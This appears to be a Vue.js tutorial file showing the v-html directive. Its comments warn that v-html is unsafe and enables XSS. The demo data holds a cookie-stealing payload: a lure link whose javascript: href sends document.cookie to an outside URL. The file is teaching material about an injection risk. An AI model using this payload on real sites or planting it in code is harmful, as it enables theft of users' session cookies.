<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>v-html的使用</title>
    <script src="../js/vue.js"></script>
</head>
<body>
  <div id="root">
    <h1 v-text="name"></h1>
<!--      v-html 可以解析html标签 但是很不安全 容易导致 xss攻击-->
    <div v-html="face">

    </div>
    <div v-html="url"></div>

  </div>

  <script>
    Vue.config.productionTip = false;
    const vm = new Vue({
      el:'#root',
      data:{
        name:'cty',
        face:'<h1>彭于晏</h1>',
          //这里就可以进行xss攻击 前提是只能拿到 httpOnly=false的cookie项
        url:'<a href=javascript:location.href="https://www.baidu.com?"+document.cookie>点我去看神秘资源....</a>'
      }
    });
  </script>
</body>
</html>